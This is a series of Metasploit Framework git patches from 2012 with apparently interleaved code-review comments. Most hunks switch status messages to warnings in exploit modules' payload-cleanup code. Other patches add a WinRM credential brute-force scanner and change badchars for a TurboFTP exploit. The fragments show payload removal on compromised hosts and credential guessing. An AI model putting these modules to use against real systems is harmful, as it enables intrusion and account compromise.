@@ -101,9 +101,9 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Move failed on #{path_tmp} [#{res.code} #{res.message}]") case res.code when 401 - print_status("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") + print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") when 403 - print_status("Warning: The web site may not allow 'Script Source Access', which is required to upload executable content.") + print_warning("Warning: The web site may not allow 'Script Source Access', which is required to upload executable content.") end return end diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb index bf9f7c0218..c797df5e28 100644 --- a/modules/exploits/windows/local/current_user_psexec.rb +++ b/modules/exploits/windows/local/current_user_psexec.rb @@ -120,8 +120,8 @@ class Metasploit3 < Msf::Exploit::Local service_delete(name, server) rescue print_error("Exception running payload: #{$!.class} : #{$!}") - print_error("#{server.ljust(16)} WARNING: May have failed to clean up!") - print_error("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}") + print_warning("#{server.ljust(16)} WARNING: May have failed to clean up!") + print_warning("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}") next end end diff --git a/modules/exploits/windows/ssl/ms04_011_pct.rb b/modules/exploits/windows/ssl/ms04_011_pct.rb index e344cf7ca1..0de658d54a 100644 --- a/modules/exploits/windows/ssl/ms04_011_pct.rb +++ b/modules/exploits/windows/ssl/ms04_011_pct.rb @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote resp = sock.get_once if (resp and resp !~ /^220/) - print_status("Warning: this server may not support STARTTLS") + print_warning("Warning: this server may not support STARTTLS") end end 
diff --git a/modules/exploits/windows/wins/ms04_045_wins.rb b/modules/exploits/windows/wins/ms04_045_wins.rb
index 29a69e3ecc..b8c362841f 100644
--- a/modules/exploits/windows/wins/ms04_045_wins.rb
+++ b/modules/exploits/windows/wins/ms04_045_wins.rb
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
# this system, or something major happened to the heap that will probably
# prevent this exploit from working.
if (not ret[3])
- print_status("Warning: the leaked heap address indicates that this attack may fail");
+ print_warning("Warning: the leaked heap address indicates that this attack may fail");
end
# The base address of our structure in memory
From 799c22554ecaa2d064dc31343991e79278a30d59 Mon Sep 17 00:00:00 2001
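Review bot: The new `print_warning(...)` line in the ms04_045_wins hunk keeps the trailing `;` from the line it replaces; Ruby does not need it and the surrounding context lines do not use it, so `print_warning("Warning: the leaked heap address indicates that this attack may fail")` without the semicolon matches the file. The enclosing method starts outside the hunk.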
From: sinn3r
Date: Wed, 24 Oct 2012 00:54:17 -0500
Subject: [PATCH 47/74] Warn user if a file/permission is being modified during new session
---
.../linux/http/symantec_web_gateway_file_upload.rb | 1 +
modules/exploits/linux/http/webid_converter.rb | 2 +-
modules/exploits/multi/http/qdpm_upload_exec.rb | 2 +-
modules/exploits/multi/http/struts_code_exec.rb | 2 +-
.../multi/http/struts_code_exec_exception_delegator.rb | 2 +-
modules/exploits/multi/http/testlink_upload_exec.rb | 1 +
modules/exploits/multi/http/webpagetest_upload_exec.rb | 10 ++++++++--
.../exploits/unix/webapp/sugarcrm_unserialize_exec.rb | 1 +
.../exploits/unix/webapp/tikiwiki_unserialize_exec.rb | 1 +
modules/exploits/unix/webapp/xoda_file_upload.rb | 1 +
.../browser/hp_easy_printer_care_xmlcachemgr.rb | 4 ++--
.../browser/hp_easy_printer_care_xmlsimpleaccessor.rb | 4 ++--
.../windows/browser/zenworks_helplauncher_exec.rb | 2 +-
.../windows/http/avaya_ccr_imageupload_exec.rb | 1 +
modules/exploits/windows/http/cyclope_ess_sqli.rb | 4 ++--
.../exploits/windows/http/oracle_btm_writetofile.rb | 4 ++--
.../windows/http/solarwinds_storage_manager_sql.rb | 4 ++--
modules/exploits/windows/http/umbraco_upload_aspx.rb | 4 ++--
modules/exploits/windows/iis/ms01_026_dbldecode.rb | 2 +-
modules/exploits/windows/iis/msadc.rb | 4 ++--
.../exploits/windows/mysql/scrutinizer_upload_exec.rb | 4 ++--
21 files changed, 36 insertions(+), 24 deletions(-)
diff --git a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
index b40764efa4..0fd2c46f7b 100644
--- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
@@ -70,6 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(client) + print_warning("Deleting temp.php") if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.fs.file.rm("temp.php") diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index 5f0eae911d..75ed6e68cd 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote res = client.fs.file.search(nil, "currencies.php", true, -1) res.each do |hit| filename = "#{hit['path']}/#{hit['name']}" - print_status("#{peer} - Restoring #(unknown)") + print_warning("#{peer} - Restoring #(unknown)") client.fs.file.rm(filename) fd = client.fs.file.new(filename, "wb") fd.write(currencies_php) diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index 4329ff1fa8..5ff6529e6a 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote end @clean_files.each do |f| - print_status("#{@peer} - Removing: #{f}") + print_warning("#{@peer} - Removing: #{f}") begin if cli.type == 'meterpreter' cli.fs.file.rm(f) diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb index 85ef707b47..554a968c4e 100644 --- a/modules/exploits/multi/http/struts_code_exec.rb +++ b/modules/exploits/multi/http/struts_code_exec.rb @@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote def on_new_session(client) if target['Platform'] == 'linux' - print_status("Deleting #{@payload_exe} payload file") + print_warning("Deleting #{@payload_exe} payload file") execute_command("/bin/sh@-c@rm #{@payload_exe}") else print_status("Windows does not allow running executables to be deleted") 
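Review bot: `print_warning("Deleting temp.php")` in the symantec_web_gateway_file_upload hunk is printed before the `client.type == "meterpreter"` check, so the message is emitted for session types where the hunk's `client.fs.file.rm("temp.php")` never runs; moving it inside the `if`, next to the `rm`, keeps the output truthful. The testlink_upload_exec and xoda_file_upload hunks of this commit place their new warning the same way. Any non-meterpreter branch of `on_new_session` is outside the hunk, so whether a deletion happens there is not visible here.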
diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index e33e0fa926..277b65efa4 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status("Deleting the #{@payload_exe} file") + print_warning("Deleting the #{@payload_exe} file") client.fs.file.rm(@payload_exe) end diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb index 7b9d70aa12..bfd37ec027 100644 --- a/modules/exploits/multi/http/testlink_upload_exec.rb +++ b/modules/exploits/multi/http/testlink_upload_exec.rb @@ -140,6 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(client) + print_warning("Deleting #{@token}.php") if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.fs.file.rm("#{@token}.php") diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb index dc66fe059b..bf342c1632 100644 --- a/modules/exploits/multi/http/webpagetest_upload_exec.rb +++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb @@ -80,8 +80,14 @@ class Metasploit3 < Msf::Exploit::Remote return end cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") - cli.fs.file.rm(@target_path) - print_status("#{@target_path} removed") + + begin + print_warning("Deleting: #{@target_path}") + cli.fs.file.rm(@target_path) + print_good("#{@target_path} removed") + rescue + print_error("Unable to delete: #{@target_path}") + end end diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index c2b8fd32bb..5362ed117f 100644 
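Review bot: The new `rescue` in the webpagetest_upload_exec hunk discards the exception, so the `print_error` cannot tell the operator why `@target_path` is still on disk; binding and reporting it, `rescue => e` and `print_error("Unable to delete: #{@target_path} (#{e.message})")`, gives the reason without changing control flow. The enclosing method starts outside the hunk.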
--- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -65,6 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote f = "pathCache.php" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin + print_warning("#{@peer} - Deleting #{f}") client.fs.file.rm(f) print_good("#{@peer} - #{f} removed to stay ninja") rescue diff --git a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb index a519dfbc8d..c013b2ca94 100644 --- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb @@ -69,6 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin + print_warning("#{@peer} - Deleting #{@upload_php}") client.fs.file.rm(@upload_php) print_good("#{@peer} - #{@upload_php} removed to stay ninja") rescue diff --git a/modules/exploits/unix/webapp/xoda_file_upload.rb b/modules/exploits/unix/webapp/xoda_file_upload.rb index 91a0c1cbf6..4c36cafbb4 100644 --- a/modules/exploits/unix/webapp/xoda_file_upload.rb +++ b/modules/exploits/unix/webapp/xoda_file_upload.rb @@ -74,6 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(client) + print_warning("Deleting #{@payload_name}") if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.fs.file.rm(@payload_name) diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb index 5af4787468..c512f2ff8b 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb 
@@ -83,9 +83,9 @@ class Metasploit3 < Msf::Exploit::Remote client.sys.process.execute(cmd, nil, {'Hidden' => true }) begin - print_status("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...") + print_warning("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...") client.fs.file.rm("C:\\windows\\system32\\" + @var_vbs_name + ".vbs") - print_status("Deleting the mof file \"#{@var_mof_name}.mof\" ...") + print_warning("Deleting the mof file \"#{@var_mof_name}.mof\" ...") client.fs.file.rm("C:\\windows\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof") rescue ::Exception => e print_error("Exception: #{e.inspect}") diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb index 0c10e27e8b..11b118f7e9 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb @@ -88,9 +88,9 @@ class Metasploit3 < Msf::Exploit::Remote client.sys.process.execute(cmd, nil, {'Hidden' => true }) begin - print_status("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...") + print_warning("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...") client.fs.file.rm("C:\\windows\\system32\\" + @var_vbs_name + ".vbs") - print_status("Deleting the mof file \"#{@var_mof_name}.mof\" ...") + print_warning("Deleting the mof file \"#{@var_mof_name}.mof\" ...") client.fs.file.rm("C:\\windows\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof") rescue ::Exception => e print_error("Exception: #{e.inspect}") diff --git a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb index ab797d84b9..fa50d338f2 100644 --- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb +++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb 
@@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_status("Deleting the vbs payload \"#{@stager_name}\" ...") + print_warning("Deleting the vbs payload \"#{@stager_name}\" ...") client.fs.file.rm("#{@temp_folder}/#{@stager_name}") print_good("The vbs stager has been deleted successfully") print_status("The exe payload #{@temp_folder}/#{@payload_name}.exe must be removed manually") diff --git a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb index dda10a4f03..5ce40072bf 100644 --- a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb +++ b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb @@ -65,6 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin + print_warning("#{@peer} - Removing #{@payload_path}") cli.fs.file.rm(@payload_path) print_good("#{@peer} - #{@payload_path} deleted") rescue ::Exception => e diff --git a/modules/exploits/windows/http/cyclope_ess_sqli.rb b/modules/exploits/windows/http/cyclope_ess_sqli.rb index de6b59784b..b16a87177e 100644 --- a/modules/exploits/windows/http/cyclope_ess_sqli.rb +++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Remote cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin - print_status("Deleting #{@php_fname}") + print_warning("Deleting #{@php_fname}") cli.fs.file.rm(@php_fname) rescue ::Exception => e print_error("Please note: #{@php_fname} is stil on disk.") end begin - print_status("Deleting #{@exe_fname}") + print_warning("Deleting #{@exe_fname}") cli.fs.file.rm(@exe_fname) rescue ::Exception => e print_error("Please note: #{@exe_fname} is still on disk.") 
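Review bot: The `print_error("Please note: #{@php_fname} is stil on disk.")` next to the new warning in the cyclope_ess_sqli hunk misspells "still", while the `@exe_fname` branch just below spells it correctly; the scrutinizer_upload_exec hunk of this commit carries the same pair of messages with the same typo. Worth fixing while these messages are being touched. The enclosing method starts outside the hunk.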
diff --git a/modules/exploits/windows/http/oracle_btm_writetofile.rb b/modules/exploits/windows/http/oracle_btm_writetofile.rb index 2252ccc0be..9c624a2d21 100644 --- a/modules/exploits/windows/http/oracle_btm_writetofile.rb +++ b/modules/exploits/windows/http/oracle_btm_writetofile.rb @@ -102,9 +102,9 @@ class Metasploit3 < Msf::Exploit::Remote client.sys.process.execute(cmd, nil, {'Hidden' => true }) begin - print_status("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...") + print_warning("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...") client.fs.file.rm("C:\\windows\\system32\\" + @var_vbs_name + ".vbs") - print_status("Deleting the mof file \"#{@var_mof_name}.mof\" ...") + print_warning("Deleting the mof file \"#{@var_mof_name}.mof\" ...") client.fs.file.rm("C:\\windows\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof") rescue ::Exception => e print_error("Exception: #{e.inspect}") diff --git a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb index a2e2c5826f..21ba5df8c4 100644 --- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb +++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb @@ -95,9 +95,9 @@ class Metasploit3 < Msf::Exploit::Remote begin jsp = @outpath.gsub(/\//, "\\\\") jsp = jsp.gsub(/"/, "") - vprint_status("#{rhost}:#{rport} - Deleting: #{jsp}") + print_warning("#{rhost}:#{rport} - Deleting: #{jsp}") cli.fs.file.rm(jsp) - print_status("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted") + print_good("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted") rescue ::Exception => e print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}") end diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb index 23b805ebe9..c53b1ff930 100644 --- a/modules/exploits/windows/http/umbraco_upload_aspx.rb +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb 
@@ -79,10 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote end files.each { |f| - print_status("#{@peer} - Deleting: #{f['path'] + "\\" + f['name']}") + print_warning("#{@peer} - Deleting: #{f['path'] + "\\" + f['name']}") cli.fs.file.rm(f['path'] + "\\" + f['name']) } - print_status("#{@peer} - #{aspx} deleted") + print_good("#{@peer} - #{aspx} deleted") rescue ::Exception => e print_error("Unable to delete #{aspx}: #{e.message}") end diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb index a700b41e53..6ddbbd0ed6 100644 --- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb +++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb @@ -245,7 +245,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "C:\\#{@win_dir}\\system32\\attrib.exe -r -h -s " + delete_me_too client.sys.process.execute(cmd, nil, {'Hidden' => true }) - print_status("Deleting #{delete_me_too} ...") + print_warning("Deleting #{delete_me_too} ...") begin client.fs.file.rm(delete_me_too) rescue ::Exception => e diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index 5f5c6ab8c1..db3b562843 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb @@ -373,11 +373,11 @@ class Metasploit3 < Msf::Exploit::Remote delete_me_too = "C:\\inetpub\\scripts\\" + @exe_payload # C:\ ? - print_status("Changing permissions on #{delete_me_too} ...") + print_warning("Changing permissions on #{delete_me_too} ...") cmd = "C:\\#{sysdir[0]}\\system32\\attrib.exe -r -h -s " + delete_me_too # winnt ? client.sys.process.execute(cmd, nil, {'Hidden' => true }) - print_status("Deleting #{delete_me_too} ...") + print_warning("Deleting #{delete_me_too} ...") begin client.fs.file.rm(delete_me_too) rescue ::Exception => e diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index f4ca7701f1..d4d04208a1 100644 
--- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -146,14 +146,14 @@ class Metasploit3 < Msf::Exploit::Remote cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin - print_status("Deleting #{@php_fname}") + print_warning("Deleting #{@php_fname}") cli.fs.file.rm(@php_fname) rescue ::Exception => e print_error("Please note: #{@php_fname} is stil on disk.") end begin - print_status("Deleting #{@exe_fname}") + print_warning("Deleting #{@exe_fname}") cli.fs.file.rm(@exe_fname) rescue ::Exception => e print_error("Please note: #{@exe_fname} is still on disk.") From ede5d0f46b8385ce9a32bfc475c3d29f9e2d2aa2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 24 Oct 2012 00:55:54 -0500 Subject: [PATCH 48/74] This is meant to be a warning, so we use print_warning --- modules/exploits/windows/browser/adobe_flash_otf_font.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/adobe_flash_otf_font.rb b/modules/exploits/windows/browser/adobe_flash_otf_font.rb index 306001bafc..85bebd9785 100644 --- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb +++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote datastore['URIPATH'] = datastore['URIPATH'] || random_uri datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\// datastore['URIPATH'] = datastore['URIPATH'][0,3] if datastore['URIPATH'].length > 3 - print_debug("URIPATH set to #{datastore['URIPATH']}") + print_warning("URIPATH set to #{datastore['URIPATH']}") super end From 6d5da1662be2ba6c3004bbf9819a0da21665d980 Mon Sep 17 00:00:00 2001 
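Review bot: The message `URIPATH set to #{datastore['URIPATH']}` in the adobe_flash_otf_font hunk is promoted from debug to warning but still does not say what the operator is being warned about, namely that the two lines above silently cut a user-supplied URIPATH down to three characters; something like `print_warning("URIPATH is limited to 3 characters, using #{datastore['URIPATH']}")` makes the warning actionable. A smaller point of style: `!~ /^\//` only tests the start of the string, so `start_with?('/')` says the same thing without a regex. The enclosing method starts outside the hunk.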
From: 0a2940 <0a2940@gmail.com>
Date: Wed, 24 Oct 2012 10:55:48 +0200
Subject: [PATCH 49/74] Update modules/post/multi/escalate/metasploit_pcaplog.rb
Stance is now passive
---
modules/post/multi/escalate/metasploit_pcaplog.rb | 1 +
1 file changed, 1 insertion(+)
diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb
index 52feb3c0b1..3d06100110 100644
--- a/modules/post/multi/escalate/metasploit_pcaplog.rb
+++ b/modules/post/multi/escalate/metasploit_pcaplog.rb
@@ -56,6 +56,7 @@ class Metasploit3 < Msf::Post
[ [ 'Linux/Unix Universal', {} ], ],
+ 'Stance' => Msf::Exploit::Stance::Passive,
'DefaultTarget' => 0, } ))
From 32ddd981ebade16bb8e23b3e4a9763c23b9086d3 Mon Sep 17 00:00:00 2001
From: 0a2940 <0a2940@gmail.com>
Date: Wed, 24 Oct 2012 10:58:09 +0200
Subject: [PATCH 50/74] linux_kernel mixin not required
---
modules/post/multi/escalate/metasploit_pcaplog.rb | 1 -
1 file changed, 1 deletion(-)
diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb
index 3d06100110..8502b2e075 100644
--- a/modules/post/multi/escalate/metasploit_pcaplog.rb
+++ b/modules/post/multi/escalate/metasploit_pcaplog.rb
@@ -10,7 +10,6 @@ require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'
-require 'msf/core/exploit/local/linux_kernel'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/local/unix'
From 2f0c2d76eacf8c8e3ba64904f1b7a68891fa1839 Mon Sep 17 00:00:00 2001
From: 0a2940 <0a2940@gmail.com>
Date: Wed, 24 Oct 2012 11:01:26 +0200
Subject: [PATCH 51/74] remove load statements
---
modules/post/multi/escalate/metasploit_pcaplog.rb | 5 -----
1 file changed, 5 deletions(-)
diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb
index 8502b2e075..64cdea7f19 100644
--- a/modules/post/multi/escalate/metasploit_pcaplog.rb
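Review bot: `'Stance' => Msf::Exploit::Stance::Passive` is added to a module whose class line reads `class Metasploit3 < Msf::Post`; the stance key is consulted by the exploit module class, so unless `Msf::Post` also reads it this entry is inert and the "Stance is now passive" of the commit message would not take effect. Worth confirming against the base class, or adding a short comment on the line saying which consumer it is meant for.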
+++ b/modules/post/multi/escalate/metasploit_pcaplog.rb
@@ -13,11 +13,6 @@ require 'msf/core/post/linux/priv'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/local/unix'
-load 'lib/msf/core/post/common.rb'
-load 'lib/msf/core/post/file.rb'
-load 'lib/msf/core/exploit/local/unix.rb'
-load 'lib/msf/core/exploit/local/linux.rb'
-
class Metasploit3 < Msf::Post
Rank = ManualRanking
From a15c35091d69e675818ab10dd54d1728668d2f41 Mon Sep 17 00:00:00 2001
From: David Maloney
Date: Wed, 24 Oct 2012 11:25:39 -0500
Subject: [PATCH 52/74] Add the WinRM login module
---
lib/msf/core/exploit/winrm.rb | 4 -
.../auxiliary/scanner/winrm/winrm_login.rb | 83 +++++++++++++++++++
2 files changed, 83 insertions(+), 4 deletions(-)
create mode 100644 modules/auxiliary/scanner/winrm/winrm_login.rb
diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb
index 90eb4f2053..ff4e6e5e30 100644
--- a/lib/msf/core/exploit/winrm.rb
+++ b/lib/msf/core/exploit/winrm.rb
@@ -20,11 +20,7 @@ module Msf
super
register_options(
[
- Opt::RHOST,
Opt::RPORT(5985),
- OptString.new('VHOST', [ false, "HTTP server virtual host" ]),
- OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]),
- OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]),
OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentification', 'WORKSTATION']),
OptString.new('URI', [ true, "The URI of the WinRM service", "/wsman" ]),
OptString.new('USERNAME', [ false, 'A specific username to authenticate as' ]),
diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb
new file mode 100644
index 0000000000..ca9c8c74af
--- /dev/null
+++ b/modules/auxiliary/scanner/winrm/winrm_login.rb
@@ -0,0 +1,83 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'rex/proto/ntlm/message'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::WinRM
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::AuthBrute
+
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'WinRM Login Utility',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ This module attempts to authenticate to a WinRM service. It currently
+ works only if the remote end allows Negotiate(NTLM) authentication.
+ Kerberos is not currently supported.
+ },
+ 'References' =>
+ [
+
+ ],
+ 'Author' => [ 'thelightcosine' ],
+ 'References' =>
+ [
+ [ 'CVE', '1999-0502'] # Weak password
+ ],
+ 'License' => MSF_LICENSE
+ )
+
+ end
+
+
+ def run_host(ip)
+ unless accepts_ntlm_auth
+ print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
+ return
+ end
+ each_user_pass do |user, pass|
+ resp,c = send_request_ntlm(test_request)
+ if resp.nil?
+ print_error "Got no reply from the server, connection may have timed out"
+ return
+ elsif resp.code == 200
+ cred_hash = {
+ :host => ip,
+ :port => rport,
+ :sname => 'winrm',
+ :pass => pass,
+ :user => user,
+ :source_type => "user_supplied",
+ :active => true
+ }
+ report_auth_info(cred_hash)
+ print_good "Valid credential found: #{user}:#{pass}"
+ elsif resp.code == 401
+ print_error "Login failed: #{user}:#{pass}"
+ else
+ print_error "Recieved unexpected Response Code: #{resp.code}"
+ end
+ end
+ end
+
+
+ def test_request
+ data = winrm_wql_msg("Select Name,Status from Win32_Service")
+ end
+
+end
From b48e355a6d5a474896aceea18a958365ff5ce62c Mon Sep 17 00:00:00 2001
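Review bot: In `run_host` the `each_user_pass` block never passes `user`/`pass` to the request it sends — `send_request_ntlm(test_request)` carries only the SOAP body, and the mixin's `send_request_ntlm` (visible later in this series) reads its credentials from `datastore['USERNAME']`/`datastore['PASSWORD']`, so unless `each_user_pass` writes each pair back into the datastore (I cannot confirm that from here) every iteration authenticates with the same fixed credentials while the success and failure messages report whichever pair the loop happens to be on. The pair should reach the request explicitly, e.g. by giving the mixin method a credential parameter and calling `send_request_ntlm(test_request, 20, user, pass)` or by setting the datastore entries inside the block before the call. The `return` on a nil response also aborts the whole host after one timeout instead of `next`-ing to the following pair, and the message on the `unless accepts_ntlm_auth` path is missing the closing parenthesis after `#{ip}`. Minor: `test_request` assigns an unused local `data`; `winrm_wql_msg(...)` alone is enough.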
From: corelanc0d3r
Date: Wed, 24 Oct 2012 20:04:54 +0200
Subject: [PATCH 53/74] fixed typo and defined badchars
---
 modules/exploits/windows/ftp/turboftp_port.rb | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)
diff --git a/modules/exploits/windows/ftp/turboftp_port.rb b/modules/exploits/windows/ftp/turboftp_port.rb
index 1e71610e63..12e5870827 100644
--- a/modules/exploits/windows/ftp/turboftp_port.rb
+++ b/modules/exploits/windows/ftp/turboftp_port.rb
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
 },
 'Author' =>
 [
- 'Zhao Liang', #Initial Descovery
+ 'Zhao Liang', #Initial Discovery
 'Lincoln', #Metasploit
 'corelanc0d3r', #Metasploit
 'thelightcosine' #Metasploit
@@ -36,9 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
 ],
 'Payload' =>
 {
- 'BadChars' => "\x00",
- 'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
- 'EncoderOptions' => { 'BufferRegister' => 'EDI' }
+ 'BadChars' => "\x00\x0a\x0d\x20",
 },
 'Targets' =>
 [
From 1dcbbdf16206a42cf53b6ccee03e1e6ac9d68ebd Mon Sep 17 00:00:00 2001
From: David Maloney
Date: Wed, 24 Oct 2012 13:50:44 -0500
Subject: [PATCH 54/74] changed indent level
---
 lib/msf/core/exploit/winrm.rb | 802 +++++++++++++++++-----------------
